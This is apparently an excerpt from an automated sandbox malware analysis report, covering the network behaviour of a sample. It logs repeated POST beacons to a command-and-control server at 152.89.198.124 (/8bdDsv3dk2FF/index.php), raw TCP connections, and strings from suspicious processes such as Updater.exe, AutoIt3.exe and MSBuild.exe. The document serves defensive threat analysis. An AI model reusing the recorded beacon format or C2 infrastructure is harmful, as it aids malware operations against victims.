                      Source: global trafficHTTP traffic detected: POST /8bdDsv3dk2FF/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 152.89.198.124Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 34 34 44 35 39 46 35 38 41 31 37 44 46 32 37 30 39 41 32 30 43 37 37 33 37 44 42 36 39 45 35 32 34 30 42 45 37 35 44 36 35 45 32 39 43 34 30 33 34 34 31 41 31 44 37 45 38 41 44 42 46 34 39 32 31 38 31 35 44 31 44 35 32 32 38 33 44 38 32 39 43 43 43 37 31 37 41 39 44 30 31 33 38 46 43 34 45 35 32 33 38 33 41 31 31 43 35 46 45 37 45 46 46 36 36 32 33 39 33 37 43 39 46 43 45 41 44 46 31 30 39 35 34 38 37 31 30 43 37 34 41 43 42 34 32 36 39 30 33 45 43 31 Data Ascii: r=44D59F58A17DF2709A20C7737DB69E5240BE75D65E29C403441A1D7E8ADBF4921815D1D52283D829CCC717A9D0138FC4E52383A11C5FE7EFF6623937C9FCEADF109548710C74ACB426903EC1
                      Source: global trafficHTTP traffic detected: POST /8bdDsv3dk2FF/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 152.89.198.124Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                      Source: global trafficHTTP traffic detected: POST /8bdDsv3dk2FF/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 152.89.198.124Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 34 34 44 35 39 46 35 38 41 31 37 44 46 32 37 30 39 41 32 30 43 37 37 33 37 44 42 36 39 45 35 32 34 30 42 45 37 35 44 36 35 45 32 39 43 34 30 33 34 34 31 41 31 44 37 45 38 41 44 42 46 34 39 32 31 38 31 35 44 31 44 35 32 32 38 33 44 38 32 39 43 43 43 37 31 37 41 39 44 30 31 33 38 46 43 34 45 35 32 33 38 33 41 31 31 43 35 46 45 37 45 46 46 36 36 32 33 39 33 37 43 39 46 43 45 41 44 46 31 30 39 35 34 38 37 31 30 43 37 34 41 43 42 34 32 36 39 30 33 45 43 31 Data Ascii: r=44D59F58A17DF2709A20C7737DB69E5240BE75D65E29C403441A1D7E8ADBF4921815D1D52283D829CCC717A9D0138FC4E52383A11C5FE7EFF6623937C9FCEADF109548710C74ACB426903EC1
                      Source: global trafficHTTP traffic detected: POST /8bdDsv3dk2FF/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 152.89.198.124Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                      Source: global trafficHTTP traffic detected: POST /8bdDsv3dk2FF/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 152.89.198.124Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 34 34 44 35 39 46 35 38 41 31 37 44 46 32 37 30 39 41 32 30 43 37 37 33 37 44 42 36 39 45 35 32 34 30 42 45 37 35 44 36 35 45 32 39 43 34 30 33 34 34 31 41 31 44 37 45 38 41 44 42 46 34 39 32 31 38 31 35 44 31 44 35 32 32 38 33 44 38 32 39 43 43 43 37 31 37 41 39 44 30 31 33 38 46 43 34 45 35 32 33 38 33 41 31 31 43 35 46 45 37 45 46 46 36 36 32 33 39 33 37 43 39 46 43 45 41 44 46 31 30 39 35 34 38 37 31 30 43 37 34 41 43 42 34 32 36 39 30 33 45 43 31 Data Ascii: r=44D59F58A17DF2709A20C7737DB69E5240BE75D65E29C403441A1D7E8ADBF4921815D1D52283D829CCC717A9D0138FC4E52383A11C5FE7EFF6623937C9FCEADF109548710C74ACB426903EC1
                      Source: global trafficHTTP traffic detected: POST /8bdDsv3dk2FF/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 152.89.198.124Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                      Source: global trafficHTTP traffic detected: POST /8bdDsv3dk2FF/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 152.89.198.124Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 34 34 44 35 39 46 35 38 41 31 37 44 46 32 37 30 39 41 32 30 43 37 37 33 37 44 42 36 39 45 35 32 34 30 42 45 37 35 44 36 35 45 32 39 43 34 30 33 34 34 31 41 31 44 37 45 38 41 44 42 46 34 39 32 31 38 31 35 44 31 44 35 32 32 38 33 44 38 32 39 43 43 43 37 31 37 41 39 44 30 31 33 38 46 43 34 45 35 32 33 38 33 41 31 31 43 35 46 45 37 45 46 46 36 36 32 33 39 33 37 43 39 46 43 45 41 44 46 31 30 39 35 34 38 37 31 30 43 37 34 41 43 42 34 32 36 39 30 33 45 43 31 Data Ascii: r=44D59F58A17DF2709A20C7737DB69E5240BE75D65E29C403441A1D7E8ADBF4921815D1D52283D829CCC717A9D0138FC4E52383A11C5FE7EFF6623937C9FCEADF109548710C74ACB426903EC1
                      Source: global trafficHTTP traffic detected: POST /8bdDsv3dk2FF/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 152.89.198.124Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                      Source: global trafficHTTP traffic detected: POST /8bdDsv3dk2FF/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 152.89.198.124Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 34 34 44 35 39 46 35 38 41 31 37 44 46 32 37 30 39 41 32 30 43 37 37 33 37 44 42 36 39 45 35 32 34 30 42 45 37 35 44 36 35 45 32 39 43 34 30 33 34 34 31 41 31 44 37 45 38 41 44 42 46 34 39 32 31 38 31 35 44 31 44 35 32 32 38 33 44 38 32 39 43 43 43 37 31 37 41 39 44 30 31 33 38 46 43 34 45 35 32 33 38 33 41 31 31 43 35 46 45 37 45 46 46 36 36 32 33 39 33 37 43 39 46 43 45 41 44 46 31 30 39 35 34 38 37 31 30 43 37 34 41 43 42 34 32 36 39 30 33 45 43 31 Data Ascii: r=44D59F58A17DF2709A20C7737DB69E5240BE75D65E29C403441A1D7E8ADBF4921815D1D52283D829CCC717A9D0138FC4E52383A11C5FE7EFF6623937C9FCEADF109548710C74ACB426903EC1
                      Source: global trafficHTTP traffic detected: POST /8bdDsv3dk2FF/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 152.89.198.124Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                      Source: global trafficHTTP traffic detected: POST /8bdDsv3dk2FF/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 152.89.198.124Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 34 34 44 35 39 46 35 38 41 31 37 44 46 32 37 30 39 41 32 30 43 37 37 33 37 44 42 36 39 45 35 32 34 30 42 45 37 35 44 36 35 45 32 39 43 34 30 33 34 34 31 41 31 44 37 45 38 41 44 42 46 34 39 32 31 38 31 35 44 31 44 35 32 32 38 33 44 38 32 39 43 43 43 37 31 37 41 39 44 30 31 33 38 46 43 34 45 35 32 33 38 33 41 31 31 43 35 46 45 37 45 46 46 36 36 32 33 39 33 37 43 39 46 43 45 41 44 46 31 30 39 35 34 38 37 31 30 43 37 34 41 43 42 34 32 36 39 30 33 45 43 31 Data Ascii: r=44D59F58A17DF2709A20C7737DB69E5240BE75D65E29C403441A1D7E8ADBF4921815D1D52283D829CCC717A9D0138FC4E52383A11C5FE7EFF6623937C9FCEADF109548710C74ACB426903EC1
                      Source: global trafficHTTP traffic detected: POST /8bdDsv3dk2FF/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 152.89.198.124Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                      Source: global trafficHTTP traffic detected: POST /8bdDsv3dk2FF/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 152.89.198.124Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 34 34 44 35 39 46 35 38 41 31 37 44 46 32 37 30 39 41 32 30 43 37 37 33 37 44 42 36 39 45 35 32 34 30 42 45 37 35 44 36 35 45 32 39 43 34 30 33 34 34 31 41 31 44 37 45 38 41 44 42 46 34 39 32 31 38 31 35 44 31 44 35 32 32 38 33 44 38 32 39 43 43 43 37 31 37 41 39 44 30 31 33 38 46 43 34 45 35 32 33 38 33 41 31 31 43 35 46 45 37 45 46 46 36 36 32 33 39 33 37 43 39 46 43 45 41 44 46 31 30 39 35 34 38 37 31 30 43 37 34 41 43 42 34 32 36 39 30 33 45 43 31 Data Ascii: r=44D59F58A17DF2709A20C7737DB69E5240BE75D65E29C403441A1D7E8ADBF4921815D1D52283D829CCC717A9D0138FC4E52383A11C5FE7EFF6623937C9FCEADF109548710C74ACB426903EC1
                      Source: global trafficHTTP traffic detected: POST /8bdDsv3dk2FF/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 152.89.198.124Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                      Source: global trafficHTTP traffic detected: POST /8bdDsv3dk2FF/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 152.89.198.124Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 34 34 44 35 39 46 35 38 41 31 37 44 46 32 37 30 39 41 32 30 43 37 37 33 37 44 42 36 39 45 35 32 34 30 42 45 37 35 44 36 35 45 32 39 43 34 30 33 34 34 31 41 31 44 37 45 38 41 44 42 46 34 39 32 31 38 31 35 44 31 44 35 32 32 38 33 44 38 32 39 43 43 43 37 31 37 41 39 44 30 31 33 38 46 43 34 45 35 32 33 38 33 41 31 31 43 35 46 45 37 45 46 46 36 36 32 33 39 33 37 43 39 46 43 45 41 44 46 31 30 39 35 34 38 37 31 30 43 37 34 41 43 42 34 32 36 39 30 33 45 43 31 Data Ascii: r=44D59F58A17DF2709A20C7737DB69E5240BE75D65E29C403441A1D7E8ADBF4921815D1D52283D829CCC717A9D0138FC4E52383A11C5FE7EFF6623937C9FCEADF109548710C74ACB426903EC1
                      Source: global trafficHTTP traffic detected: POST /8bdDsv3dk2FF/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 152.89.198.124Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                      Source: global trafficHTTP traffic detected: POST /8bdDsv3dk2FF/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 152.89.198.124Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 34 34 44 35 39 46 35 38 41 31 37 44 46 32 37 30 39 41 32 30 43 37 37 33 37 44 42 36 39 45 35 32 34 30 42 45 37 35 44 36 35 45 32 39 43 34 30 33 34 34 31 41 31 44 37 45 38 41 44 42 46 34 39 32 31 38 31 35 44 31 44 35 32 32 38 33 44 38 32 39 43 43 43 37 31 37 41 39 44 30 31 33 38 46 43 34 45 35 32 33 38 33 41 31 31 43 35 46 45 37 45 46 46 36 36 32 33 39 33 37 43 39 46 43 45 41 44 46 31 30 39 35 34 38 37 31 30 43 37 34 41 43 42 34 32 36 39 30 33 45 43 31 Data Ascii: r=44D59F58A17DF2709A20C7737DB69E5240BE75D65E29C403441A1D7E8ADBF4921815D1D52283D829CCC717A9D0138FC4E52383A11C5FE7EFF6623937C9FCEADF109548710C74ACB426903EC1
                      Source: global trafficHTTP traffic detected: POST /8bdDsv3dk2FF/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 152.89.198.124Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                      Source: global trafficHTTP traffic detected: POST /8bdDsv3dk2FF/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 152.89.198.124Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 34 34 44 35 39 46 35 38 41 31 37 44 46 32 37 30 39 41 32 30 43 37 37 33 37 44 42 36 39 45 35 32 34 30 42 45 37 35 44 36 35 45 32 39 43 34 30 33 34 34 31 41 31 44 37 45 38 41 44 42 46 34 39 32 31 38 31 35 44 31 44 35 32 32 38 33 44 38 32 39 43 43 43 37 31 37 41 39 44 30 31 33 38 46 43 34 45 35 32 33 38 33 41 31 31 43 35 46 45 37 45 46 46 36 36 32 33 39 33 37 43 39 46 43 45 41 44 46 31 30 39 35 34 38 37 31 30 43 37 34 41 43 42 34 32 36 39 30 33 45 43 31 Data Ascii: r=44D59F58A17DF2709A20C7737DB69E5240BE75D65E29C403441A1D7E8ADBF4921815D1D52283D829CCC717A9D0138FC4E52383A11C5FE7EFF6623937C9FCEADF109548710C74ACB426903EC1
                      Source: global trafficHTTP traffic detected: POST /8bdDsv3dk2FF/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 152.89.198.124Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                      Source: global trafficHTTP traffic detected: POST /8bdDsv3dk2FF/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 152.89.198.124Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 34 34 44 35 39 46 35 38 41 31 37 44 46 32 37 30 39 41 32 30 43 37 37 33 37 44 42 36 39 45 35 32 34 30 42 45 37 35 44 36 35 45 32 39 43 34 30 33 34 34 31 41 31 44 37 45 38 41 44 42 46 34 39 32 31 38 31 35 44 31 44 35 32 32 38 33 44 38 32 39 43 43 43 37 31 37 41 39 44 30 31 33 38 46 43 34 45 35 32 33 38 33 41 31 31 43 35 46 45 37 45 46 46 36 36 32 33 39 33 37 43 39 46 43 45 41 44 46 31 30 39 35 34 38 37 31 30 43 37 34 41 43 42 34 32 36 39 30 33 45 43 31 Data Ascii: r=44D59F58A17DF2709A20C7737DB69E5240BE75D65E29C403441A1D7E8ADBF4921815D1D52283D829CCC717A9D0138FC4E52383A11C5FE7EFF6623937C9FCEADF109548710C74ACB426903EC1
                      Source: Joe Sandbox ViewIP Address: 152.89.198.124 152.89.198.124
                      Source: Joe Sandbox ViewASN Name: NEXTVISIONGB NEXTVISIONGB
                      Source: Joe Sandbox ViewJA3 fingerprint: 28a2c9bd18a11de089ef85a160da29e4
                      Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.32
                      Source: unknownTCP traffic detected without corresponding DNS query: 2.19.126.163
                      Source: unknownTCP traffic detected without corresponding DNS query: 2.19.126.163
                      Source: unknownTCP traffic detected without corresponding DNS query: 217.20.57.22
                      Source: unknownTCP traffic detected without corresponding DNS query: 217.20.57.22
                      Source: unknownTCP traffic detected without corresponding DNS query: 104.18.38.233
                      Source: unknownTCP traffic detected without corresponding DNS query: 172.64.149.23
                      Source: unknownTCP traffic detected without corresponding DNS query: 104.18.38.233
                      Source: unknownTCP traffic detected without corresponding DNS query: 104.18.38.233
                      Source: unknownTCP traffic detected without corresponding DNS query: 172.64.149.23
                      Source: unknownTCP traffic detected without corresponding DNS query: 104.18.38.233
                      Source: unknownTCP traffic detected without corresponding DNS query: 162.159.36.2
                      Source: unknownTCP traffic detected without corresponding DNS query: 162.159.36.2
                      Source: unknownTCP traffic detected without corresponding DNS query: 162.159.36.2
                      Source: unknownTCP traffic detected without corresponding DNS query: 162.159.36.2
                      Source: unknownTCP traffic detected without corresponding DNS query: 162.159.36.2
                      Source: unknownTCP traffic detected without corresponding DNS query: 152.89.198.124
                      Source: unknownTCP traffic detected without corresponding DNS query: 152.89.198.124
                      Source: unknownTCP traffic detected without corresponding DNS query: 152.89.198.124
                      Source: unknownTCP traffic detected without corresponding DNS query: 152.89.198.124
                      Source: unknownTCP traffic detected without corresponding DNS query: 152.89.198.124
                      Source: unknownTCP traffic detected without corresponding DNS query: 152.89.198.124
                      Source: unknownTCP traffic detected without corresponding DNS query: 152.89.198.124
                      Source: unknownTCP traffic detected without corresponding DNS query: 152.89.198.124
                      Source: unknownTCP traffic detected without corresponding DNS query: 152.89.198.124
                      Source: unknownTCP traffic detected without corresponding DNS query: 152.89.198.124
                      Source: unknownTCP traffic detected without corresponding DNS query: 152.89.198.124
                      Source: unknownTCP traffic detected without corresponding DNS query: 152.89.198.124
                      Source: unknownTCP traffic detected without corresponding DNS query: 152.89.198.124
                      Source: unknownTCP traffic detected without corresponding DNS query: 152.89.198.124
                      Source: unknownTCP traffic detected without corresponding DNS query: 152.89.198.124
                      Source: unknownTCP traffic detected without corresponding DNS query: 152.89.198.124
                      Source: unknownTCP traffic detected without corresponding DNS query: 152.89.198.124
                      Source: unknownTCP traffic detected without corresponding DNS query: 152.89.198.124
                      Source: unknownTCP traffic detected without corresponding DNS query: 152.89.198.124
                      Source: unknownTCP traffic detected without corresponding DNS query: 152.89.198.124
                      Source: unknownTCP traffic detected without corresponding DNS query: 152.89.198.124
                      Source: unknownTCP traffic detected without corresponding DNS query: 152.89.198.124
                      Source: unknownTCP traffic detected without corresponding DNS query: 152.89.198.124
                      Source: unknownTCP traffic detected without corresponding DNS query: 152.89.198.124
                      Source: unknownTCP traffic detected without corresponding DNS query: 152.89.198.124
                      Source: unknownTCP traffic detected without corresponding DNS query: 152.89.198.124
                      Source: unknownTCP traffic detected without corresponding DNS query: 152.89.198.124
                      Source: unknownTCP traffic detected without corresponding DNS query: 152.89.198.124
                      Source: unknownTCP traffic detected without corresponding DNS query: 152.89.198.124
                      Source: unknownTCP traffic detected without corresponding DNS query: 152.89.198.124
                      Source: unknownTCP traffic detected without corresponding DNS query: 152.89.198.124
                      Source: unknownTCP traffic detected without corresponding DNS query: 152.89.198.124
                      Source: unknownTCP traffic detected without corresponding DNS query: 152.89.198.124
                      Source: unknownTCP traffic detected without corresponding DNS query: 152.89.198.124
                      Source: C:\Users\user\AppData\Local\friend\Updater.exeCode function: 35_2_0074D935 InternetReadFile,SetEvent,GetLastError,SetEvent,35_2_0074D935
                      Source: unknownHTTP traffic detected: POST /8bdDsv3dk2FF/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 152.89.198.124Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                      Source: MSBuild.exe, 00000025.00000002.2940433393.0000000001459000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://152.89.198.124/8bdDsv3dk2FF/index.php
                      Source: MSBuild.exe, 00000025.00000002.2940433393.0000000001418000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://152.89.198.124/8bdDsv3dk2FF/index.phped
                      Source: MSBuild.exe, 00000025.00000002.2940433393.0000000001447000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://152.89.198.124/8bdDsv3dk2FF/index.phpp
                      Source: Reminder.tmp, 00000001.00000003.1684312693.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, Reminder.tmp, 00000001.00000003.1686108256.0000000002630000.00000004.00001000.00020000.00000000.sdmp, Reminder.tmp, 00000003.00000003.1726794198.0000000003170000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crl.certum.pl/cscasha2.crl0q
                      Source: Reminder.tmp, 00000001.00000003.1684312693.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, Reminder.tmp, 00000001.00000003.1686108256.0000000002630000.00000004.00001000.00020000.00000000.sdmp, Reminder.tmp, 00000003.00000003.1726794198.0000000003170000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crl.certum.pl/ctnca.crl0k
                      Source: Updater.exe, 00000023.00000003.2236424027.0000000004B3F000.00000004.00001000.00020000.00000000.sdmp, Updater.exe, 00000023.00000002.2240225926.000000000496D000.00000004.00001000.00020000.00000000.sdmp, Updater.exe, 00000023.00000003.2236568857.0000000004A53000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000026.00000003.2407053379.0000000004D8F000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000026.00000002.2411997935.0000000004BBD000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000026.00000003.2407350277.0000000004CA3000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 0000002A.00000003.2497030014.0000000004B43000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.com/gs/gstimestampingsha2g2.crl0
                      Source: Updater.exe, 00000023.00000003.2236424027.0000000004B3F000.00000004.00001000.00020000.00000000.sdmp, Updater.exe, 00000023.00000002.2240225926.000000000496D000.00000004.00001000.00020000.00000000.sdmp, Updater.exe, 00000023.00000003.2236568857.0000000004A53000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000026.00000003.2407053379.0000000004D8F000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000026.00000002.2411997935.0000000004BBD000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000026.00000003.2407350277.0000000004CA3000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 0000002A.00000003.2497030014.0000000004B43000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.com/gscodesignsha2g3.crl0
                      Source: Updater.exe, 00000023.00000003.2236424027.0000000004B3F000.00000004.00001000.00020000.00000000.sdmp, Updater.exe, 00000023.00000002.2240225926.000000000496D000.00000004.00001000.00020000.00000000.sdmp, Updater.exe, 00000023.00000003.2236568857.0000000004A53000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000026.00000003.2407053379.0000000004D8F000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000026.00000002.2411997935.0000000004BBD000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000026.00000003.2407350277.0000000004CA3000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 0000002A.00000003.2497030014.0000000004B43000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.com/root-r3.crl0c
                      Source: Updater.exe, 00000023.00000003.2236424027.0000000004B3F000.00000004.00001000.00020000.00000000.sdmp, Updater.exe, 00000023.00000002.2240225926.000000000496D000.00000004.00001000.00020000.00000000.sdmp, Updater.exe, 00000023.00000003.2236568857.0000000004A53000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000026.00000003.2407053379.0000000004D8F000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000026.00000002.2411997935.0000000004BBD000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000026.00000003.2407350277.0000000004CA3000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 0000002A.00000003.2497030014.0000000004B43000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r3.crl0
                      Source: Reminder.tmp, 00000001.00000003.1684312693.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, Reminder.tmp, 00000001.00000003.1686108256.0000000002630000.00000004.00001000.00020000.00000000.sdmp, Reminder.tmp, 00000003.00000003.1726794198.0000000003170000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t
                      Source: Reminder.tmp, 00000001.00000003.1684312693.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, Reminder.tmp, 00000001.00000003.1686108256.0000000002630000.00000004.00001000.00020000.00000000.sdmp, Reminder.tmp, 00000003.00000003.1726794198.0000000003170000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#
                      Source: Reminder.tmp, 00000001.00000003.1686108256.0000000002630000.00000004.00001000.00020000.00000000.sdmp, Reminder.tmp, 00000003.00000003.1726794198.0000000003170000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://cscasha2.ocsp-ce
                      Source: Reminder.tmp, 00000001.00000003.1684312693.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, Reminder.tmp, 00000001.00000003.1686108256.0000000002630000.00000004.00001000.00020000.00000000.sdmp, Reminder.tmp, 00000003.00000003.1726794198.0000000003170000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://cscasha2.ocsp-certum.com04
                      Source: Reminder.tmp, 00000001.00000003.1684312693.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, Reminder.tmp, 00000001.00000003.1686108256.0000000002630000.00000004.00001000.00020000.00000000.sdmp, Reminder.tmp, 00000003.00000003.1726794198.0000000003170000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ocsp.sectigo.com0
                      Source: Reminder.tmp, 00000001.00000003.1686108256.0000000002630000.00000004.00001000.00020000.00000000.sdmp, Reminder.tmp, 00000003.00000003.1726794198.0000000003170000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ocsp.us
                      Source: Updater.exe, 00000023.00000003.2236424027.0000000004B3F000.00000004.00001000.00020000.00000000.sdmp, Updater.exe, 00000023.00000002.2240225926.000000000496D000.00000004.00001000.00020000.00000000.sdmp, Updater.exe, 00000023.00000003.2236568857.0000000004A53000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000026.00000003.2407053379.0000000004D8F000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000026.00000002.2411997935.0000000004BBD000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000026.00000003.2407350277.0000000004CA3000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 0000002A.00000003.2497030014.0000000004B43000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ocsp2.globalsign.com/gscodesignsha2g30V
                      Source: Updater.exe, 00000023.00000003.2236424027.0000000004B3F000.00000004.00001000.00020000.00000000.sdmp, Updater.exe, 00000023.00000002.2240225926.000000000496D000.00000004.00001000.00020000.00000000.sdmp, Updater.exe, 00000023.00000003.2236568857.0000000004A53000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000026.00000003.2407053379.0000000004D8F000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000026.00000002.2411997935.0000000004BBD000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000026.00000003.2407350277.0000000004CA3000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 0000002A.00000003.2497030014.0000000004B43000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ocsp2.globalsign.com/gstimestampingsha2g20
                      Source: Updater.exe, 00000023.00000003.2236424027.0000000004B3F000.00000004.00001000.00020000.00000000.sdmp, Updater.exe, 00000023.00000002.2240225926.000000000496D000.00000004.00001000.00020000.00000000.sdmp, Updater.exe, 00000023.00000003.2236568857.0000000004A53000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000026.00000003.2407053379.0000000004D8F000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000026.00000002.2411997935.0000000004BBD000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000026.00000003.2407350277.0000000004CA3000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 0000002A.00000003.2497030014.0000000004B43000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ocsp2.globalsign.com/rootr306
                      Source: Reminder.tmp, 00000001.00000003.1686108256.0000000002630000.00000004.00001000.00020000.00000000.sdmp, Reminder.tmp, 00000003.00000003.1726794198.0000000003170000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://repository.certum
                      Source: Reminder.tmp, 00000001.00000003.1684312693.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, Reminder.tmp, 00000001.00000003.1686108256.0000000002630000.00000004.00001000.00020000.00000000.sdmp, Reminder.tmp, 00000003.00000003.1726794198.0000000003170000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://repository.certum.pl/cscasha2.cer0
                      Source: Reminder.tmp, 00000001.00000003.1684312693.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, Reminder.tmp, 00000001.00000003.1686108256.0000000002630000.00000004.00001000.00020000.00000000.sdmp, Reminder.tmp, 00000003.00000003.1726794198.0000000003170000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://repository.certum.pl/ctnca.cer09
                      Source: Updater.exe, 00000023.00000003.2236424027.0000000004B3F000.00000004.00001000.00020000.00000000.sdmp, Updater.exe, 00000023.00000002.2240225926.000000000496D000.00000004.00001000.00020000.00000000.sdmp, Updater.exe, 00000023.00000003.2236568857.0000000004A53000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000026.00000003.2407053379.0000000004D8F000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000026.00000002.2411997935.0000000004BBD000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000026.00000003.2407350277.0000000004CA3000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 0000002A.00000003.2497030014.0000000004B43000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://secure.globalsign.com/cacert/gscodesignsha2g3ocsp.crt08
                      Source: Updater.exe, 00000023.00000003.2236424027.0000000004B3F000.00000004.00001000.00020000.00000000.sdmp, Updater.exe, 00000023.00000002.2240225926.000000000496D000.00000004.00001000.00020000.00000000.sdmp, Updater.exe, 00000023.00000003.2236568857.0000000004A53000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000026.00000003.2407053379.0000000004D8F000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000026.00000002.2411997935.0000000004BBD000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000026.00000003.2407350277.0000000004CA3000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 0000002A.00000003.2497030014.0000000004B43000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://secure.globalsign.com/cacert/gstimestampingsha2g2.crt0
